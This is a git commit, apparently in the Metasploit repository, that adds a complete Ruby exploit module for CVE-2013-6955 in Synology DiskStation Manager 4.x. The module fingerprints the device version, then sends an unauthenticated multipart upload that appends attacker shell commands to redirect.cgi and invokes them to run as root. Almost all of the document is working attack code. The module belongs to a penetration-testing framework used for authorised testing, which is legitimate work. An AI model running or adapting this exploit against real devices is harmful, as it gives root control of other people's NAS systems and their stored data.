Land #2787, @mwulftange's exploit for CVE-2013-6955
This commit is contained in:
commit
f43bc02297
|
@ -0,0 +1,162 @@
|
|||
##
|
||||
## This module requires Metasploit: http//metasploit.com/download
|
||||
## Current source: https://github.com/rapid7/metasploit-framework
|
||||
###
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
DEVICE_INFO_PATTERN = /major=(?<major>\d+)&minor=(?<minor>\d+)&build=(?<build>\d+)
|
||||
&junior=\d+&unique=synology_\w+_(?<model>[^&]+)/x
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Synology DiskStation Manager SLICEUPLOAD Remote Command Execution",
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability found in Synology DiskStation Manager (DSM)
|
||||
versions 4.x, which allows the execution of arbitrary commands under root
|
||||
privileges.
|
||||
The vulnerability is located in /webman/imageSelector.cgi, which allows to append
|
||||
arbitrary data to a given file using a so called SLICEUPLOAD functionality, which
|
||||
can be triggered by an unauthenticated user with a specially crafted HTTP request.
|
||||
This is exploited by this module to append the given commands to /redirect.cgi,
|
||||
which is a regular shell script file, and can be invoked with another HTTP request.
|
||||
Synology reported that the vulnerability has been fixed with versions 4.0-2259,
|
||||
4.2-3243, and 4.3-3810 Update 1, respectively; the 4.1 branch remains vulnerable.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Markus Wulftange' # Discovery, Metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2013-6955' ],
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Platform' => ['unix'],
|
||||
'Arch' => ARCH_CMD,
|
||||
'Payload' =>
|
||||
{
|
||||
'DisableNops' => true,
|
||||
'Space' => 0x31337,
|
||||
'Compat' =>
|
||||
{
|
||||
'PayloadType' => 'cmd',
|
||||
'RequiredCmd' => 'generic perl telnet',
|
||||
}
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
['Automatic', {}]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'License' => MSF_LICENSE,
|
||||
'DisclosureDate' => 'Oct 31 2013'
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(5000)
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
print_status("#{peer} - Trying to detect installed version")
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri('webman', 'info.cgi'),
|
||||
'vars_get' => { 'host' => ''}
|
||||
})
|
||||
|
||||
if res and res.code == 200 and res.body =~ DEVICE_INFO_PATTERN
|
||||
version = "#{$~[:major]}.#{$~[:minor]}"
|
||||
build = $~[:build]
|
||||
model = $~[:model].sub(/^[a-z]+/) { |s| s[0].upcase }
|
||||
model = "DS#{model}" unless model =~ /^[A-Z]/
|
||||
else
|
||||
print_status("#{peer} - Detection failed")
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
print_status("#{peer} - Model #{model} with version #{version}-#{build} detected")
|
||||
|
||||
case version
|
||||
when '4.0'
|
||||
return Exploit::CheckCode::Vulnerable if build < '2259'
|
||||
when '4.1'
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
when '4.2'
|
||||
return Exploit::CheckCode::Vulnerable if build < '3243'
|
||||
when '4.3'
|
||||
return Exploit::CheckCode::Vulnerable if build < '3810'
|
||||
return Exploit::CheckCode::Detected if build == '3810'
|
||||
end
|
||||
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
cmds = [
|
||||
# sed is used to restore the redirect.cgi
|
||||
"sed -i -e '/sed -i -e/,$d' /usr/syno/synoman/redirect.cgi",
|
||||
payload.encoded
|
||||
].join("\n")
|
||||
|
||||
mime_msg = Rex::MIME::Message.new
|
||||
mime_msg.add_part('login', nil, nil, 'form-data; name="source"')
|
||||
mime_msg.add_part('logo', nil, nil, 'form-data; name="type"')
|
||||
|
||||
# unfortunately, Rex::MIME::Message canonicalizes line breaks to \r\n,
|
||||
# so we use a placeholder and replace it later
|
||||
cmd_placeholder = Rex::Text::rand_text_alphanumeric(10)
|
||||
mime_msg.add_part(cmd_placeholder, 'application/octet-stream', nil,
|
||||
'form-data; name="foo"; filename="bar"')
|
||||
|
||||
post_body = mime_msg.to_s
|
||||
post_body.strip!
|
||||
post_body.sub!(cmd_placeholder, cmds)
|
||||
|
||||
# fix multipart encoding
|
||||
post_body.gsub!(/\r\n(--#{mime_msg.bound})/, ' \\1')
|
||||
|
||||
# send request to append shell commands
|
||||
print_status("#{peer} - Injecting the payload...")
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri('webman', 'imageSelector.cgi'),
|
||||
'ctype' => "multipart/form-data; boundary=#{mime_msg.bound}",
|
||||
'headers' => {
|
||||
'X-TYPE-NAME' => 'SLICEUPLOAD',
|
||||
'X-TMP-FILE' => '/usr/syno/synoman/redirect.cgi'
|
||||
},
|
||||
'data' => post_body
|
||||
})
|
||||
|
||||
unless res and res.code == 200 and res.body.include?('error_noprivilege')
|
||||
fail_with(Failure::Unknown, "#{peer} - Unexpected response, probably the exploit failed")
|
||||
end
|
||||
|
||||
# send request to invoke the injected shell commands
|
||||
print_status("#{peer} - Executing the payload...")
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri('redirect.cgi'),
|
||||
})
|
||||
|
||||
# Read command output if cmd/unix/generic payload was used
|
||||
if datastore['CMD']
|
||||
unless res and res.code == 200
|
||||
fail_with(Failure::Unknown, "#{peer} - Unexpected response, probably the exploit failed")
|
||||
end
|
||||
|
||||
print_good("#{peer} - Command successfully executed")
|
||||
print_line(res.body)
|
||||
end
|
||||
end
|
||||
end
|
||||
|
Loading…
Reference in New Issue